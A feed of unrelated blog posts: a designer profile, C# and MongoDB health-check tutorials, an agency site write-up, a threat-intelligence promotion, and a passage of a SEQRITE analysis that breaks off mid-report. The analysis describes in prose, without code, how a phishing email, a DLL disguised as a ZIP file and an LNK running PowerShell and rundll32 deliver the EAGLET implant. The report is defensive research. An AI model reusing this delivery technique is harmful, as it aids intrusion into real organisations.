Blog

  • Designer Spotlight: Ivor Jian | Codrops



    Hi! I’m Ivor Jian, a multidisciplinary designer and creative developer from Washington, USA. I create websites that blend Swiss-inspired precision with a clean, utilitarian style. My goal is to craft projects that evoke emotion through quality and tasteful animation.

    As my design career continues to develop, I’m constantly learning and expanding my horizons. Below are some projects I’m proud to share from the early stages of my creative journey.

    Featured projects

    Renz Ward

    A portfolio website for a UK-based designer who specializes in a technically forward aesthetic. From concept to completion, we collaborated on the visual direction, motion design, and intricate site details. The site features a grid-focused layout and animations that align with the designer’s visual identity.

    The biggest challenge was syncing the dial animation with the project scroll and indicator. I’m not ashamed to say I relied heavily on Perplexity to help with this interaction. The result is a technical yet sophisticated website that I’m proud to share. The site currently has limited content, as Renz is still wrapping up projects. I plan to submit it to CSSDA and Awwwards once it’s complete.

    Personal website

    My portfolio website is always a work in progress, but I’m happy to share its current iteration. I wanted the site to reflect who I am, both personally and as a designer, through its typography, animations, and the fine details throughout.

    PRJCT—Archi

    This is my first passion project, and it received an honorable mention on CSSDA. As a fan of interior design and architecture, I wanted to create a minimal and experimental website to explore interactions and showcase AI-generated architecture. My focus was to deliver a clear and refined experience with clean micro-interactions and smooth page transitions. The images were generated in Midjourney.

    I originally wanted to use real publications but was concerned about legal issues. The biggest challenge was making the individual showcases cohesive, as there is a lot of variation in the generated images. To achieve the best results, I used real publication images as references.

    Polestar

    A redesign concept of the Polestar brand. Their design language was right up my alley, so I took on the challenge of creating a bespoke web experience while staying aligned with their core visual identity.

    Visual explorations

    I enjoy exploring and creating random designs just for the sake of it. This helps me expand my horizons as a designer and can potentially lead to new opportunities.

    About me

    I’m a 22-year-old self-taught freelance designer and developer. I started doing graphic design at 13, which I believe gave me a strong foundation when I fully shifted to web design about two years ago. Without a formal education in building websites, I’ve had the freedom to explore ideas and learn by doing. This has helped me discover the kind of work I want to pursue and shape my design style. I started gaining some traction on X/Twitter after consistently posting my designs at the start of 2025, and I’ve met so many talented and wonderful people since beginning my journey there.

    My approach to design

    I don’t follow a strict set of principles or a fixed approach to design. I usually start by looking for inspiration before diving into a project. That said, I tend to favor a 12-column grid and clean, modern Swiss typefaces. I always iterate, exploring as many options as possible before choosing one direction to refine.

    Favorite tools

    My favorite tools are Webflow for development, GSAP for web animations, Perplexity for brainstorming and problem-solving, and Figma for design. This tool stack covers everything I need at the moment.

    Inspiration

    I love browsing beautiful visuals and websites to continually refine my taste. For design inspiration, my favorite resources are Savee and Searchsystem for their curated aesthetics of clean and technical design. When it comes to websites, I look to Awwwards and various agency sites with distinct, well-crafted brand identities. I also have favorite designers and developers whose work I admire and learn from by studying their craft; among them are Dennis Snellenberg, Ilja Van Eck, Oliver Larose, and Niklas Rosen.

    Future goals

    I want to keep learning and creating meaningful projects by collaborating with creative individuals and brands that align with my style of websites. I focus on combining clean typography with interactions that make a site shine with a modern and technical touch. I plan to become an award-winning designer and developer through persistence and a genuine love for great design.

    Final thoughts

    Thank you so much for reading about my thoughts and latest projects! I’m by no means a top-notch designer or developer yet, but I hope you enjoyed the visuals and got to know a bit about me. Consistently share your work—it might just change your life.

    Keep learning, exploring, and iterating. Feel free to reach out to me on X/Twitter if you want to chat or have a project in mind. ♥️




  • 2 ways to check communication with MongoDB | Code4IT



    Health Checks are fundamental to keep track of the health of a system. How can we check if MongoDB is healthy?


    In any complex system, you have to deal with external dependencies.

    More often than not, if one of the external systems (a database, another API, or an authentication provider) is down, the whole system might be affected.

    In this article, we’re going to learn what Health Checks are, how to create custom ones, and how to check whether a MongoDB instance can be reached or not.

    What are Health Checks?

    A Health Check is a special type of HTTP endpoint that allows you to understand the status of the system – well, it’s a check on the health of the whole system, including external dependencies.

    You can use it to understand whether the application itself and all of its dependencies are healthy and responding in a reasonable amount of time.

    Those endpoints are also useful for humans, but are even more useful for tools that monitor the application and can automatically fix some issues if occurring – for example, they can restart the application if it’s in a degraded status.

    How to add Health Checks in .NET

    Lucky for us, .NET already comes with Health Check capabilities, so we can just follow the existing standard without reinventing the wheel.

    For the sake of this article, I created a simple .NET API application.

    Head to the Program class – or, in general, wherever you configure the application – and add this line:

    builder.Services.AddHealthChecks();
    

    and then, after var app = builder.Build();, you must add the following line to have the health checks displayed under the /healthz path:

    app.MapHealthChecks("/healthz");
    

    To sum up, the minimal structure should be:

    var builder = WebApplication.CreateBuilder(args);
    
    builder.Services.AddControllers();
    
    builder.Services.AddHealthChecks();
    
    var app = builder.Build();
    
    app.MapHealthChecks("/healthz");
    
    app.MapControllers();
    
    app.Run();
    

    Now, if you run the application and navigate to /healthz, you’ll see an almost empty page with two characteristics:

    • the status code is 200;
    • the only printed result is Healthy

    Clearly, that’s not enough for us.

    How to create a custom Health Check class in .NET

    Every project has its own dependencies and requirements. We should be able to build custom Health Checks and add them to our endpoint.

    It’s just a matter of creating a new class that implements IHealthCheck, an interface that lives under the Microsoft.Extensions.Diagnostics.HealthChecks namespace.

    Then, you have to implement the method that tells us whether the system under test is healthy or degraded:

    Task<HealthCheckResult> CheckHealthAsync(HealthCheckContext context, CancellationToken cancellationToken = default);
    

    The method returns a HealthCheckResult, which is a struct that can have one of these values:

    • Healthy: everything is OK;
    • Degraded: the application is running, but it’s taking too long to respond;
    • Unhealthy: the application is offline, or an error occurred while performing the check.

    So, for example, we build a custom Health Check class such as:

    public class MyCustomHealthCheck : IHealthCheck
    {
        private readonly IExternalDependency _dependency;
    
        public MyCustomHealthCheck(IExternalDependency dependency)
        {
            _dependency = dependency;
        }
    
        public Task<HealthCheckResult> CheckHealthAsync(
            HealthCheckContext context, CancellationToken cancellationToken = default)
        {
            var isHealthy = _dependency.IsHealthy();
    
            if (isHealthy)
            {
                return Task.FromResult(HealthCheckResult.Healthy());
            }
            return Task.FromResult(HealthCheckResult.Unhealthy());
        }
    }
    

    And, finally, register it in the Program class:

    builder.Services.AddHealthChecks()
        .AddCheck<MyCustomHealthCheck>("A custom name");
    

    Now, you can create a stub class that implements IExternalDependency to toy with the different result types. In fact, if we create and inject a stub class like this:

    public class StubExternalDependency : IExternalDependency
    {
        public bool IsHealthy() => false;
    }
    

    and we run the application, we can see that the final result of the application is Unhealthy.
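
    For completeness, the stub must also be registered in the DI container so it can be injected into MyCustomHealthCheck. A minimal sketch (the singleton lifetime here is just an assumption):

    builder.Services.AddSingleton<IExternalDependency, StubExternalDependency>();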

    A question for you: why should we give each health check a name, such as “A custom name”? Drop a comment below 📩

    Adding a custom Health Check Provider for MongoDB

    Now we can create a custom Health Check for MongoDB.

    Of course, we will need a library to access Mongo: simply install the MongoDB.Driver NuGet package – we’ve already used this library in a previous article.

    Then, you can create a class like this:

    public class MongoCustomHealthCheck : IHealthCheck
    {
        private readonly IConfiguration _configurations;
        private readonly ILogger<MongoCustomHealthCheck> _logger;
    
        public MongoCustomHealthCheck(IConfiguration configurations, ILogger<MongoCustomHealthCheck> logger)
        {
            _configurations = configurations;
            _logger = logger;
        }
    
        public async Task<HealthCheckResult> CheckHealthAsync(
            HealthCheckContext context, CancellationToken cancellationToken = default)
        {
            try
            {
                await IsMongoHealthy();
                return HealthCheckResult.Healthy();
            }
            catch (Exception ex)
            {
                // log the failure, so the injected logger is actually put to use
                _logger.LogError(ex, "MongoDB health check failed");
                return HealthCheckResult.Unhealthy();
            }
        }
    
        private async Task IsMongoHealthy()
        {
            string connectionString = _configurations.GetConnectionString("MongoDB");
            MongoUrl url = new MongoUrl(connectionString);
    
            IMongoDatabase dbInstance = new MongoClient(url)
                .GetDatabase(url.DatabaseName)
                .WithReadPreference(new ReadPreference(ReadPreferenceMode.Secondary));
    
            _ = await dbInstance.RunCommandAsync<BsonDocument>(new BsonDocument { { "ping", 1 } });
        }
    }
    

    As you can see, it’s nothing more than a generic class with some services injected into the constructor.

    The key part is the IsMongoHealthy method: it’s here that we access the DB instance. Let’s have a closer look at it.

    How to Ping a MongoDB instance

    Here’s again the IsMongoHealthy method.

    string connectionString = _configurations.GetConnectionString("MongoDB");
    MongoUrl url = new MongoUrl(connectionString);
    
    IMongoDatabase dbInstance = new MongoClient(url)
        .GetDatabase(url.DatabaseName)
        .WithReadPreference(new ReadPreference(ReadPreferenceMode.Secondary));
    
    _ = await dbInstance.RunCommandAsync<BsonDocument>(new BsonDocument { { "ping", 1 } });
    

    Clearly, we create a reference to a specific DB instance: new MongoClient(url).GetDatabase(url.DatabaseName). Notice that we’re requiring access to the Secondary node, to avoid performing operations on the Primary node.

    Then, we send the PING command: dbInstance.RunCommandAsync<BsonDocument>(new BsonDocument { { "ping", 1 } }).

    Now what? If the instance is reachable, the PING command returns a document like { "ok" : 1 }; if the command cannot be executed, it throws a System.TimeoutException.
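
    If you prefer not to rely solely on the exception, you can also inspect the returned document. A minimal sketch, reusing the dbInstance from above:

    BsonDocument pingResult = await dbInstance.RunCommandAsync<BsonDocument>(new BsonDocument { { "ping", 1 } });
    // a successful ping replies with { "ok" : 1 }
    bool isOk = pingResult.Contains("ok") && pingResult["ok"].ToDouble() == 1.0;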

    MongoDB Health Checks with AspNetCore.Diagnostics.HealthChecks

    If we don’t want to write such things on our own, we can rely on pre-existing libraries.

    AspNetCore.Diagnostics.HealthChecks is a library you can find on GitHub that automatically handles several types of Health Checks for .NET applications.

    Note that this library is NOT maintained or supported by Microsoft – but it’s featured in the official .NET documentation.

    This library exposes several NuGet packages for tens of different dependencies you might want to consider in your Health Checks. For example, we have Azure.IoTHub, CosmosDb, Elasticsearch, Gremlin, SendGrid, and many more.

    Obviously, we’re gonna use the one for MongoDB. It’s quite easy.

    First, you have to install the AspNetCore.HealthChecks.MongoDb NuGet package.

    NuGet package for AspNetCore.HealthChecks.MongoDb

    Then, you have to just add a line of code to the initial setup:

    builder.Services.AddHealthChecks()
        .AddMongoDb(mongodbConnectionString: builder.Configuration.GetConnectionString("MongoDB"));
    

    That’s it! Neat and easy! 😎

    Why do we even want a custom provider?

    Ok, if we can just add a line of code instead of creating a brand-new class, why should we bother creating the whole custom class?

    There are some reasons to create a custom provider:

    1. You want more control over the DB access: for example, you want to ping only Secondary nodes, as we did before;
    2. You don’t just want to check if the DB is up; you also want to measure the performance of specific operations, such as retrieving all the documents from a specified collection (see the sketch below).
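
    Here’s a hypothetical sketch of that second scenario, returning Degraded when a representative query is slow. The injected IMongoDatabase, the “Orders” collection name, and the 500 ms threshold are illustrative assumptions, not part of the original example:

    public async Task<HealthCheckResult> CheckHealthAsync(
        HealthCheckContext context, CancellationToken cancellationToken = default)
    {
        var stopwatch = System.Diagnostics.Stopwatch.StartNew();
        try
        {
            // run a cheap, representative operation against an assumed collection
            IMongoCollection<BsonDocument> collection = _database.GetCollection<BsonDocument>("Orders");
            _ = await collection.EstimatedDocumentCountAsync(cancellationToken: cancellationToken);
            stopwatch.Stop();

            return stopwatch.ElapsedMilliseconds > 500
                ? HealthCheckResult.Degraded($"Query took {stopwatch.ElapsedMilliseconds} ms")
                : HealthCheckResult.Healthy();
        }
        catch (Exception ex)
        {
            return HealthCheckResult.Unhealthy("Cannot query MongoDB", ex);
        }
    }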

    But, yes, in general, you can simply use the NuGet package we used in the previous section, and you’re good to go.

    Further readings

    As usual, the best way to learn more about a topic is by reading the official documentation:

    🔗 Health checks in ASP.NET Core | Microsoft Docs

    How can you use MongoDB locally? Well, easy: with Docker!

    🔗 First steps with Docker: download and run MongoDB locally | Code4IT

    As we saw, we can perform a PING operation on a MongoDB instance.

    🔗 Ping command | MongoDB

    This article first appeared on Code4IT 🐧

    Finally, here’s the link to the GitHub repo with the list of Health Checks:

    🔗 AspNetCore.Diagnostics.HealthChecks | GitHub

    and, if you want to sneak peek at the MongoDB implementation, you can read the code here:

    🔗 MongoDbHealthCheck.cs | GitHub

    Wrapping up

    In this article, we’ve learned two ways to implement Health Checks for a MongoDB connection.

    You can either use a pre-existing NuGet package, or you can write a custom one on your own. It all depends on your use cases.

    I hope you enjoyed this article! Let’s keep in touch on Twitter or LinkedIn, if you want! 🤜🤛

    Happy coding!

    🐧






  • Why Threat Intelligence is the Missing Link in Your Cybersecurity Strategy



    In the ever-evolving landscape of cyber threats, organizations are no longer asking if they’ll be targeted but when. Traditional cybersecurity measures, such as firewalls, antivirus software, and access control, remain essential. But they’re often reactive, responding only after a threat has emerged. In contrast, threat intelligence enables organizations to get ahead of the curve by proactively identifying and preparing for risks before they strike.

    What is Threat Intelligence?

    At its core, threat intelligence is the process of gathering, analyzing, and applying information about existing and potential attacks. This includes data on threat actors, tactics and techniques, malware variants, phishing infrastructure, and known vulnerabilities.

    The value of threat intelligence lies not just in raw data, but in its context—how relevant it is to your environment, and how quickly you can act on it.

    Why Organizations Need Threat Intelligence

    1. Cyber Threats Are Evolving Rapidly

    New ransomware variants, phishing techniques, and zero-day vulnerabilities emerge daily. Threat intelligence helps organizations stay informed about these developments in real time, allowing them to adjust their defenses accordingly.

    2. Contextual Awareness Improves Response

    When a security event occurs, knowing whether it’s a one-off anomaly or part of a broader attack campaign is crucial. Threat intelligence provides this clarity, helping teams prioritize incidents that pose real risk over false alarms.

    3. It Powers Proactive Defense

    With actionable intelligence, organizations can proactively patch vulnerabilities, block malicious domains, and tighten controls on specific threat vectors—preventing breaches before they occur.

    4. Supports Compliance and Risk Management

    Many data protection regulations require businesses to demonstrate risk-based security practices. Threat intelligence can support compliance with frameworks like ISO 27001, GDPR, and India’s DPDP Act by providing documented risk assessments and preventive actions.

    5. Essential for Incident Detection and Response

    Modern SIEMs, SOAR platforms, and XDR solutions rely heavily on enriched threat feeds to detect threats early and respond faster. Without real-time intelligence, these systems are less effective and may overlook critical indicators of compromise.

    Types of Threat Intelligence

    • Strategic Intelligence: High-level trends and risks to inform business decisions.
    • Tactical Intelligence: Insights into attacker tools, techniques, and procedures (TTPs).
    • Operational Intelligence: Real-time data on active threats, attack infrastructure, and malware campaigns.
    • Technical Intelligence: Specific IOCs (indicators of compromise) like IP addresses, hashes, or malicious URLs.

    Each type plays a unique role in creating a layered defense posture.

    Challenges in Implementing Threat Intelligence

    Despite its benefits, threat intelligence can be overwhelming. The sheer volume of data, lack of context, and integration issues often dilute its impact. To be effective, organizations need:

    • Curated, relevant intelligence feeds
    • Automated ingestion into security tools
    • Clear mapping to business assets and risks
    • Skilled analysts to interpret and act on the data

    The Way Forward: Intelligence-Led Security

    Security teams must shift from passive monitoring to intelligence-led security operations. This means treating threat intelligence as a core input for every security decision, such as prioritizing vulnerabilities, hardening cloud environments, or responding to an incident.

    In a world where attackers collaborate, automate, and innovate, defenders need every edge. Threat intelligence provides that edge.

    Ready to Build an Intelligence-Driven Defense?

    Seqrite Threat Intelligence helps enterprises gain real-time visibility into global and India-specific emerging threats. Backed by over 10 million endpoint signals and advanced malware analysis, it’s designed to supercharge your SOC, SIEM, or XDR. Explore Seqrite Threat Intelligence to strengthen your cybersecurity strategy.




  • Reform Collective: A New Website, Designed to Be Seen




    Reform Collective is a digital-first, full-service design and development agency. We’ve been partnering with clients of all sizes for 11 years and going strong! We work with ambitious teams building interesting things. If it doesn’t clash with our ethics and you respect our time, we’re in.

    Design

    Our previous site was no longer working for us. It didn’t reflect the kind of work we were doing, and more importantly, it created friction. The navigation was convoluted, the structure too deep, and the visual style didn’t align with what we were showing clients in proposals or conversations. We’d share a project we were proud of, and when people landed on the site, they either got confused trying to find it or lost interest navigating a dated UX. It was time to move on.

    The redesign was a reset. We stripped the site down to the essentials. Clean layout. Wide spacing. Minimal structure. The goal was to create something that felt open, confident, and easy to move through. We wanted the experience to reflect how we approach client work: intentional, clear, and results-focused — all while telling a strong story.

    We also made a conscious decision to pull back on animation. While we still use motion to support interaction, we didn’t want it to take over the experience. Performance and clarity came first.

    Sharing Our Work

    One of the most deliberate changes we made was how we present our work. Traditional case studies are saturated with summaries, timelines, and process write-ups. We realized that’s not how people consume portfolio content anymore. They don’t read. They scroll. They skim. They decide quickly if you’re worth their time.

    So we stopped writing to be read and started designing to be seen.

    We removed all the fluff: no intro copy, no strategy breakdowns, no “here’s what we learned.” Just clean visuals, concise project titles, and frictionless browsing. If the work can’t speak for itself, it probably isn’t strong enough to be featured.

    This shift wasn’t just aesthetic. It was a strategic choice. We wanted to reduce noise and let the quality of the output stand on its own. The site isn’t there to sell. It’s there to show. And showing means getting people to the work faster, without distractions.

    The end result is a portfolio that feels fast, direct, and unapologetically visual. No click tunnels. No over-explaining. Just a clear runway to the work.

    The Navigation

    We designed the global menu to feel structural. Instead of floating over the site or fading in as a layer, it pushes the entire layout downward, physically moving the page to make room. It’s a deliberate gesture. Spatial, not just visual.

    The motion is clean and architectural: a full-width panel slides down from the top, snapping into place with precision. There’s no blur, no parallax, no visual fluff. Just sharp contrast, bold typography, and three primary paths: Our Work, About Us, and Reform Nova. These are anchored by lean sub-labels and a strong call to action.

    This isn’t a nav trying to show off. It’s built to orient you quickly, frame the experience, and get out of the way. The choice to displace the page content rather than obscure it reinforces how we think about experience design: create clarity by introducing hierarchy, not noise.

    It feels tactile. It feels intentional. And it reflects how we build: structural logic, tight motion, and a clear sense of priority.

    The Nerdy Tech Details from Our Lead Engineer

    Webby Award Section

    I started with an AI prototype in v0 for the wavy lines background. v0 is surprisingly good at interpreting vague instructions. I can literally tell it “make it goopier” and it will spit out code that makes things feel goopier. I ended up with a pretty snazzy prototype. Because it used react-three-fiber, I could basically copy-paste it directly into our code, install dependencies, and be 80% done! Much faster and more interesting than setting up a Three.js scene by hand, in my opinion.

    I will say this workflow has its quirks, though. The AI is great at the initial vibe check, but it chokes on specific feedback. It’s pretty hard to describe visual bugs in text, and since the model can’t see the output, it’s basically guessing most of the time. I also noticed it tends to “over-edit,” sometimes refactoring an entire component for a tiny change. I ended up fixing several bugs myself because v0 just couldn’t handle them.

    The next part was the mouse follower. I wanted a video that follows the cursor, appearing over the wavy background but under the header text. As it passes behind the text, the text’s color inverts so it remains visible.

    The “following the mouse” part was easy! The inversion effect was a bit trickier. My first thought was to use mix-blend-mode paired with backdrop-filter. It seemed like a great idea and should have worked perfectly—or at least, that’s what I’d say if it actually had. I ended up trying all kinds of random approaches to find something that worked across every browser. Major upside: I got to justify all my monitors by putting a different browser on each while coding.

    The breakthrough came when I stopped trying to make one element do everything. I split the effect into two perfectly synchronized divs:

    1. The <Inverter>: A ghost div with no content. Its only job is to carry the backdrop-filter: invert(1) that flips the text color.
    2. The <Video>: This holds the actual video. It’s placed in a lower stacking context using z-index: -1, so it slides beneath the text but stays above the page background.

    I used GSAP’s quickTo to animate them both in sync. To the user (that’s YOU), it appears as a single element. It feels like a bit of a hack, but it works flawlessly across all browsers.

    Here’s the gist of it:

    // animate both refs at the same time so they appear as one element
    const moveX = gsap.quickTo([videoRef.current, inverter.current], "x", { /* ... */ });
    const moveY = gsap.quickTo([videoRef.current, inverter.current], "y", { /* ... */ });
    
    // in the JSX
    <Wrapper>
        {/* other content here, ofc */}
        <Video ref={videoRef} {...video?.data} />
        <Inverter ref={inverter} />
    </Wrapper>
    
    // and the styles...
    const Video = styled(BackgroundVideo, {
        position: "fixed",
        zIndex: -1, // pushed behind the text
        filter: "invert(1) contrast(0.5)",
        /* ... */
    });
    
    const Inverter = styled("div", {
        position: "fixed",
        pointerEvents: "none", // for text selection
        backdropFilter: "invert(1) contrast(2)",
        /* ... */
    });

    The styles here use https://www.restyle.dev/, by the way — it’s a runtime-only CSS library (i.e., no bundler config required), which is pretty cool.

    Nova Blocks Section

    This feature is a scroll-driven animation where a grid of 3D blocks zooms past the camera. The fun part is that it’s all done with pure CSS transforms—no WebGL or Three.js needed.

    The setup involves a container with perspective and a bunch of “block” divs, each using transform-style: preserve-3d. Each block contains several child divs rotated into place to form a cube. For performance, I only animate the parent block’s transform, which is more efficient than moving hundreds of individual faces. I used the MDN demo cube for inspiration on this one.

    Of course, doing this led me straight into the weird world of browser bugs. (I seem to end up there a lot…)

    1. Safari’s Rendering Glitch:

    Safari was z-fighting like crazy. It would randomly render faces that should have been occluded by an adjacent cube, which looked terrible. See web-bugs/issues/155416. The fix ended up being twofold:

    • Manual Culling: As an optimization, I was already rendering only the faces that would be visible based on the cube’s grid quadrant. This is basically manual back-face culling, which helped reduce the number of layers Safari had to compute. It probably improves performance anyway, so… thanks, Safari, I guess.
    • Forced Stacking: I’m assigning each cube a specific z-index based on its row and column. It feels a bit brute-force, but it tells Safari exactly how to stack things—and it completely eliminated the flicker.

    Here’s the gist of the Block.tsx component:

    export default function Block({
      vertical,
      horizontal,
      row,
      column,
    }: {
      // vertical/horizontal basically represents the 'quadrant' on-screen
      vertical: "top" | "bottom";
      horizontal: "left" | "right";
      row: number;
      column: number;
    }) {
      // Explicitly set z-index based on grid position to prevent z-fighting in Safari
      // This was basically trial and error to figure out
      const style =
        vertical === "top" && horizontal === "left"
          ? { zIndex: -row - column }
          : vertical === "bottom" && horizontal === "right"
            ? { zIndex: -1 }
            : horizontal === "left"
              ? { zIndex: -column }
              : { zIndex: -row };
    
      // Conditionally render only the necessary faces
      return (
        // Wrapper carries the per-cube z-index computed above
        <Wrapper style={style}>
          {/* placeholder face components – the actual names are not shown in the original snippet */}
          {horizontal === "left" && <LeftFace />}
          {horizontal === "right" && <RightFace />}
          {vertical === "top" && <TopFace />}
          {vertical === "bottom" && <BottomFace />}
        </Wrapper>
      );
    }
    
    const Wrapper = styled("div", {
      transformStyle: "preserve-3d", // the magic property for the cube
      /* ... */
    });
    

    2. Firefox’s Pinning Problem

    Our site uses CSS Subgrid for global alignment, which is awesome in my opinion because it narrows the gap between design and development. If something in the design is aligned to the grid, it can now be literally aligned to the grid in the code too.

    Caveat: I found that in Firefox, position: sticky was completely broken inside a subgrid container. A pinned element would start pinning but never unpin, because its positioning context was being resolved to the wrong grid container.

    After I isolated it in a CodePen and reported the bug (web-bugs/issues/152027), the fix was simply to remove subgrid from the sticky element’s parent and apply the grid styles directly.

    Running into weird bugs is frustrating, but it’s part of the deal when you’re building cool things. You just have to plan for it in your timeline. And if you find a bug in some strange edge case, I’m a big advocate for taking the time to create a minimal test case and report it. It helps pinpoint exactly what’s going wrong, which leads to a better solution—and it helps make the web better for everyone.

    Thanks for reading!

    Ready to build something with us? We’re always looking for great companies and individuals to partner with on new projects. Get started →

    The Reform Co. Team

    P.S. We’re also hiring, feel free to check out our careers page. ❤️




  • Access items from the end of the array using the ^ operator | Code4IT




    Say that you have an array of N items and you need to access an element counting from the end of the collection.

    Usually, we tend to use the Length property of the array, and then subtract the number corresponding to the position we want to reach:

    string[] values = {
        "alfa",
        "bravo",
        "charlie",
        "delta",
        "echo",
        "foxtrot",
        "golf"
    };
    
    var echo = values[values.Length - 3];
    

    As you can see, we are accessing the same variable twice in a row: values[values.Length - 3].

    We can simplify that specific line of code by using the ^ operator:

    string[] values = {
        "alfa",
        "bravo",
        "charlie",
        "delta",
        "echo",
        "foxtrot",
        "golf"
    };
    
    var echo = values[^3];
    

    Yes, that’s just syntactic sugar, but it can help make your code more readable. In fact, if you have a look at the IL code generated by both examples, they are perfectly identical. IL is quite difficult to read and understand, but you can confirm that both syntaxes are equivalent by looking at the decompiled C# code:

    C# decompiled code

    Performance is not affected by this operator, so it’s just a matter of readability.
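
    Under the hood, ^3 is just a System.Index value, so the following accesses are all equivalent:

    Index fromEnd = ^3;                   // same as Index.FromEnd(3)
    var a = values[fromEnd];              // "echo"
    var b = values[values.Length - 3];    // "echo"
    var c = values[^3];                   // "echo"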

    Clearly, you still have to take care of array bounds – if you access values[^55] you’ll get an IndexOutOfRangeException.

    Note that the position is 1-based!

    string[] values = {
        "alfa",
        "bravo",
        "charlie",
        "delta",
        "echo",
        "foxtrot",
        "golf"
    };
    
    Console.WriteLine(values[^1]); //golf
    Console.WriteLine(values[^0]); //IndexOutOfRangeException
    

    Further readings

    Using ^ is a nice trick that many C# developers don’t know. There are some special characters that can help us but are often not used. Like the @ operator!

    🔗 C# Tip: use the @ prefix when a name is reserved

    This article first appeared on Code4IT 🐧

    Wrapping up

    In this article, we’ve learned that just using the right syntax can make our code much more readable.

    But we also learned that not every new addition in the language brings performance improvements to the table.

    I hope you enjoyed this article! Let’s keep in touch on Twitter or on LinkedIn, if you want! 🤜🤛

    Happy coding!

    🐧






  • Format Interpolated Strings | Code4IT



    Interpolated strings are those built with the $ symbol, which you can use to create strings from existing variables or properties. Did you know that you can apply custom formatting to such values?


    As you know, there are many ways to “create” strings in C#. You can use a StringBuilder, you can simply concatenate strings, or you can use interpolated strings.

    Interpolated? WHAT? I’m pretty sure that you’ve already used interpolated strings, even if you did not know the “official” name:

    int age = 31;
    string bio = $"Hi, I'm {age} years old";
    

    That’s it: an interpolated string is one where you can reference a variable or a property within the string definition, using the $ and the {} operators to generate such strings.

    Did you know that you can even format how the interpolated value must be rendered when creating the string? It’s just a matter of specifying the format after the : sign:

    Formatting dates

    The easiest way to learn it is by formatting dates:

    DateTime date = new DateTime(2021,05,23);
    
    Console.WriteLine($"The printed date is {date:yyyy-MM-dd}"); //The printed date is 2021-05-23
    Console.WriteLine($"Another version is {date:yyyy-MMMM-dd}"); //Another version is 2021-May-23
    
    Console.WriteLine($"The default version is {date}"); //The default version is 23/05/2021 00:00:00
    

    Here we have date:yyyy-MM-dd which basically means “format the date variable using the yyyy-MM-dd format”.

    There are, obviously, different ways to format dates, as described on the official documentation. Some of the most useful are:

    • dd: day of the month, in number (from 01 to 31);
    • ddd: abbreviated day name (eg: Mon)
    • dddd: complete day name (eg: Monday)
    • hh: hour in a 12-hour clock (01->12)
    • HH: hour in a 24-hour clock (00->23)
    • MMMM: full month name (eg: May)

    and so on.

    Formatting numbers

    Similar to dates, we can format numbers.

    For example, we can format a double number as currency or as a percentage:

    var cost = 12.41;
    Console.WriteLine($"The cost is {cost:C}"); // The cost is £12.41
    
    var variation = -0.254;
    Console.WriteLine($"There is a variation of {variation:P}"); //There is a variation of -25.40%
    

    Again, there are lots of different ways to format numbers:

    • C: currency – it takes the current culture, so it may be Euro, Yen, or whatever currency, depending on the process’ culture;
    • E: exponential number, used for scientific operations
    • P: percentage – formatting the value 1 with P yields 100.00% (as we’ve seen above, -0.254 becomes -25.40%);
    • X: hexadecimal
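
    A few quick examples of these specifiers (outputs assume an English culture, matching the currency example above):

    Console.WriteLine($"{255:X}");         // FF
    Console.WriteLine($"{12345.6789:E}");  // 1.234568E+004
    Console.WriteLine($"{0.5:P}");         // 50.00%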

    Further readings

    There are too many formats that you can use to convert a value to a string, and we cannot explore all of them here.

    But still, you can have a look at several ways to format date and time in C#

    🔗 Custom date and time format strings | Microsoft Docs

    and, obviously, to format numbers

    🔗 Standard numeric format strings | Microsoft Docs

    This article first appeared on Code4IT 🐧

    Finally, remember that interpolated strings are not the only way to build strings from variables; you can (and should!) use string.Format:

    🔗 How to use String.Format – and why you should care about it | Code4IT

    Wrapping up

    I hope you enjoyed this article! Let’s keep in touch on Twitter or on LinkedIn, if you want! 🤜🤛

    Happy coding!

    🐧






  • Ung0901 Targets Russian Aerospace Defense Using Eaglet Implant



    Contents

    • Introduction
    • Initial Findings
    • Infection Chain
    • Technical Analysis
      • Stage 0 – Malicious Email File
      • Stage 1 – Malicious LNK File
      • Stage 2 – Looking into the Decoy File
      • Stage 3 – Malicious EAGLET Implant
    • Hunting and Infrastructure
      • Infrastructural Details
      • Similar Campaigns
    • Attribution
    • Conclusion
    • SEQRITE Protection
    • IOCs
    • MITRE ATT&CK

    Introduction

    SEQRITE Labs APT-Team has recently found a campaign targeting the Russian aerospace industry. The campaign is aimed at employees of Voronezh Aircraft Production Association (VASO), one of the major aircraft production entities in Russia, and uses товарно-транспортная накладная (TTN) documents – consignment notes critical to Russian logistics operations – as lures. The malware ecosystem involved in this campaign relies on a malicious LNK file and the EAGLET DLL implant, which executes malicious commands and exfiltrates data.

    In this blog, we will explore the technical details of the campaign we encountered during our analysis. We will examine its various stages, starting with a deep dive into the initial infection chain, moving on to the implant used, and ending with an overall view of the campaign.

    Initial Findings

    On 27th of June, while hunting malicious spear-phishing attachments, our team found a malicious email file that surfaced on sources like VirusTotal. Upon further hunting, we also found a malicious LNK file responsible for executing the malicious DLL attachment, whose file type masquerades as a ZIP attachment.

    Looking into the email, we found that the file Транспортная_накладная_ТТН_№391-44_от_26.06.2025.zip (which translates to Transport_Consignment_Note_TTN_No.391-44_from_26.06.2025.zip) is actually a DLL file. Further hunting surfaced a shortcut [LNK] file with the same name. We then decided to look into the workings of these files.

    Infection Chain

     

    Technical Analysis

    We will break the analysis of this campaign into three parts: first the malicious EML file, then the attachment, i.e., the malicious DLL implant, and finally the LNK file.

    Stage 0 – Malicious Email File

    Initially, we found a malicious email file named backup-message-10.2.2.20_9045-800282.eml, uploaded from the Russian Federation, and looked into its specifics.

    We found that the email was sent to an employee at Voronezh Aircraft Production Association (VASO) from a “Transport and Logistics Centre”, regarding a delivery note.

    Looking at the contents of the email, we found that the message was crafted to announce a recent logistics movement, referencing a consignment note (Товарно-транспортная накладная №391-44 от 26.06.2025) and urging the receiver to prepare for the delivery of certain cargo in 2-3 days. Besides impersonating an individual, the threat actor included a malicious attachment masquerading as a ZIP file; upon downloading it, we figured out that it was a malicious DLL implant.

    Apart from the malicious DLL implant, we also hunted down a malicious LNK file with the same name, which we believe was dropped by another spear-phishing attachment. It is used to execute the DLL implant, which we have termed EAGLET.

    In the next section, we will look into the malicious LNK file.

    Stage 1 – Malicious LNK File

    Looking inside the LNK file, we found that it performs a specific set of tasks that finally executes the malicious DLL file and spawns a decoy pop-up on the screen. It does this in the following manner.

    It uses the powershell.exe binary to run a script in the background that enumerates the masquerading ZIP file, i.e., the malicious EAGLET implant. If it finds the implant, it executes it via the rundll32.exe LOLBIN; otherwise, it recursively looks for the file under %USERPROFILE% and, failing that, under %TEMP%, executing it wherever it is found.

